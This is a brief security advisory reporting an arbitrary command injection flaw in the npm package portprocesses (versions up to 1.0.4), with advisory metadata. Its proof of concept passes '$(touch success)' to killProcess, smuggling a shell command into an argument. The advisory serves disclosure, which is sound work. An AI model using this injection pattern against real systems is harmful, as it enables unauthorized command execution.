An Arbitrary Command Injection vulnerability was reported in portprocesses impacting versions <= 1.0.4.
The following example demonstrates the vulnerability and will run touch success therefore creating a file named success.
const portprocesses = require("portprocesses");
portprocesses.killProcess("$(touch success)");
{
"github_reviewed_at": "2021-03-31T17:50:32Z",
"github_reviewed": true,
"cwe_ids": [
"CWE-77",
"CWE-78"
],
"nvd_published_at": "2021-03-31T15:15:00Z",
"severity": "MODERATE"
}